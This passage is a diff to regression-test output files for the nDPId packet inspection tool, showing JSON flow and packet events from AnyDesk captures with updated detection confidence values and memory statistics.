Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01481{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1613977595379,"flow_last_seen":1613977595391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1705,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1613977595391,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"ee644a8a34c434abca4b737ec1d9efad","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"F8:4E:27:4E:F9:33:35:2F:1A:69:71:D5:02:6B:B8:72:EF:B7:BA:B0"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595407,"flow_last_seen":1613977595407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595407,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1613977595407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAABAAABAAEAGtfrAqAGywKgBu8tHG54tLA3cAAAAALAC\/\/97PgAAAgQFtAEDAwUBAQgKHE34xQAAAAAEAgAA"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1613977595407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595407,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDlAAIAGAADAqAG7wKgBshuey0dV\/SLKLSwN3YAS\/\/+E5AAAAgQFtAEDAwgBAQQC"} 
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1613977595407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGthLAqAGywKgBu8tHG54tLA3dVf0iy1AQIABwXwAAAAAAAAAA"} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595407,"flow_last_seen":1613977595408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1613977595408,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01579{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613977595407,"flow_last_seen":1613977595549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":813,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1613977595549,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"4b505adfb4a921c5a3a39d293b0811e1","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"86:4F:2A:9F:24:71:FD:0D:6A:35:56:AC:D8:7B:3A:19:E8:03:CA:2E"}} 
-01279{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1613977595407,"flow_last_seen":1613977595964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1286,"flow_tot_l4_payload_len":3316,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} -01182{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2502,"flow_first_seen":1613977595379,"flow_last_seen":1613977618224,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5506,"flow_tot_l4_payload_len":2002706,"flow_avg_l4_payload_len":800,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 
+01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595407,"flow_last_seen":1613977595408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1613977595408,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01579{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613977595407,"flow_last_seen":1613977595549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":813,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1613977595549,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS 
(probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"4b505adfb4a921c5a3a39d293b0811e1","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"86:4F:2A:9F:24:71:FD:0D:6A:35:56:AC:D8:7B:3A:19:E8:03:CA:2E"}} +01279{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1613977595407,"flow_last_seen":1613977595964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1286,"flow_tot_l4_payload_len":3316,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": 
{"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +01182{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2502,"flow_first_seen":1613977595379,"flow_last_seen":1613977618224,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5506,"flow_tot_l4_payload_len":2002706,"flow_avg_l4_payload_len":800,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","packets-captured":2521,"packets-processed":2521,"total-skipped-flows":0,"total-l4-payload-len":2006246,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1613977618224} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2521/2521 @@ -35,9 +35,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5958193 bytes -~~ total memory freed........: 5958193 bytes -~~ total allocations/frees...: 120658/120658 +~~ total memory allocated....: 6091827 bytes +~~ total memory freed........: 6091827 bytes +~~ total allocations/frees...: 123420/123420 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 455 chars ~~ json string max len.......: 1584 chars 
diff --git a/test/results/anydesk.pcap.out b/test/results/anydesk.pcap.out index 855cc70da..6d5e49410 100644 --- a/test/results/anydesk.pcap.out +++ b/test/results/anydesk.pcap.out 
@@ -2,18 +2,18 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591342198821} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7580000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591342198821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1591342198821,"pkt":"AFBW5dKtAAwplUdeCABFAABbtopAAEAGCwXAqJWBM1PvkI3\/AFB7i54qMVwSUlAY+DR5WwAAFwMDAC7mz9mv7V5op8uDzrVlyYzGPOa22i4SIRv\/ctzVUMWyqJzhwIdSdK\/Qd7DJrcKc"} 
-00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7580000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7580000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591342198821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1591342198821,"pkt":"AAwplUdeAFBW5dKtCABFAAAoe1AAAIAGRnIzU++QwKiVgQBQjf8xXBJSe4ueXVAQ+vBP7wAAAAAAAAAA"} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591342198998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1591342198998,"pkt":"AFBW5dKtAAwplUdeCABFAABYtotAAEAGCwfAqJWBM1PvkI3\/AFB7i55dMVwSUlAY+DR5WAAAFwMDACvmz9mv7V5oqHbrZghdQbdzwBFFDzsTJ43BfdwI8acT8HfThIVfMXtYD9Ln"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342199201,"flow_last_seen":1591342199201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1591342199201,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1591342199201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1591342199201,"pkt":"AFBW5dKtAAwplUdeCABFAAA8CJBAAEAGudPAqJWBM1Pu26oPAFApppzyAAAAAKAC+vB4hwAAAgQFtAQCCAqukMx3AAAAAAEDAwc="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1591342199366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1591342199366,"pkt":"AAwplUdeAFBW5dKtCABFAAAse1UAAIAGRx4zU+7bwKiVgQBQqg9odWR8Kaac82AS+vDm4QAAAgQFtAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1591342199366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1591342199366,"pkt":"AFBW5dKtAAwplUdeCABFAAAoCJFAAEAGuebAqJWBM1Pu26oPAFApppzzaHVkfVAQ+vB4cwAA"} -01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto 
on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": 
